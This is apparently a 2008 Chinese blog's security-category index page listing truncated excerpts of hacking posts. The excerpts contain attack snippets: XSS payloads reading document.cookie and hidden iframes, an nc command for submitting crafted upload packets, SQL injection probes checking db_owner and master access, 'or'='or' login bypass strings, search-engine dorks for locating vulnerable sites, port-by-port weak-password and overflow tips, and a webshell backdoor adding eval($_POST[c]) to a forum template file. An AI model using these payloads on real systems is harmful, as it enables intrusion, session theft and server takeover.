您正在查看 "安全" 分类下的文章
2008年03月17日 星期一 00:35
1. 漏洞回顾
2. 进一步追踪
3. IE可本地执行任意命令分析
4. IE的ActiveX安全设置可被绕过分析
5. 扩展:扩展:IE的DHTML实现中关于html源码再解析部分和IE的安全机制脱节
6. 临时解决方法
7. 测试环境
8. 参考
9. 感谢
<1> 漏洞回顾
Bugtraq 3867描述了IE允许恶意网站在浏览其网页的客户机上执行任意程序。
如果你不了解该漏洞的信息请参阅:
http://magaz |
2008年03月13日 星期四 15:19
1:传漏洞利用的原理只是针对form格式上传的asp和php脚本***
nc(netcat)
用于提交数据包
dos界面下运行:
nc -vv www.***.com 80<1.txt
-vv: 回显
80: www端口
1.txt: 就是你要发送的数据包
(更多使用方法请查 |
2008年03月06日 星期四 17:18
<script>alert(document.cookie)</script>,
<script>alert("******")</script>
<meta http-equiv="refresh" content="1;url=http://www.baidu.com"> 转向代码
<script language=vbscript> window.location.href="http://www.baidu.com" </script>
指定转象百度!
<iframe name="I1" src="http://www.baidu.com/" width="0" height="0"
|
2008年03月05日 星期三 15:04
【From http://www.devdao.com/article/303184.html】
1、概述
在这两年中,安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制,如果你的网络应用程序开发者没有遵循安全代码进行开发,攻击者将通过80端口进入你的系统。广泛被使用的两个主要攻击技术是SQL注入[ref1]和CSS[ref2]攻击。SQL注入是指:通过互联网的输入区域,插入SQL meta-characters(特殊字符 代表一些数据)和指令,操纵执行后端的SQL查询的技术。这些攻击主要针对其他 |
2008年02月28日 星期四 10:58
2008年02月25日 星期一 15:50
kikkert security (unhackables@hotmail.com)提供了如下测试代码:
基础认证站点有一种方式就是在URL中提交一个用户名(和/或密码):
mike@msdn.microsoft.com">http://mike@msdn.microsoft.com
另一个可能性就是把IP地址转换为DWORD地址(一些代理服务器,路由器和站点不允许
使用这种方式)
http://msdn.microsoft. |
2008年02月22日 星期五 22:32
搜索引擎白给你shell经典的用户名密码'or'='or''or'1'='1网上好多这样的文
章我的只不过是来个小总结,恩其实光是总结还不够,因为我写的还不是很全面
。其实搜索这些漏洞我们必须要先连接关于搜索引擎的一些语法下面给大家介绍
一下inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之
类的很有用. intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标
题,URL等的文字).site: 可以限制你搜索范围的域名. filetype: 搜索文件的后
缀或者扩展名intit |
2008年02月22日 星期五 13:23
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型
and char(124)%2Buser%2Bchar(124)=0
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '% |
2008年02月21日 星期四 22:30
21端口:
21端口是默认的FTP端口,利用方式:弱口令探测/溢出
目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个漏洞。
这个端口可以参照网上的教程,就不多说了,下面的TELNET也是一样,扫描到了弱口令直接登陆上去。
22端口
22端口是SSH远程登录协议,利用方式:弱口令探测
23端口
23端口是TLENET的默认端口,利用方式:弱口令探测/溢出
一般大家用弱口令探测得比较多,但是成功率比较低,还是溢出来得快,毕竟权限高,想做什么都可以!
网上 |
2008年02月21日 星期四 22:12
注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)
1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪 |
|
| 
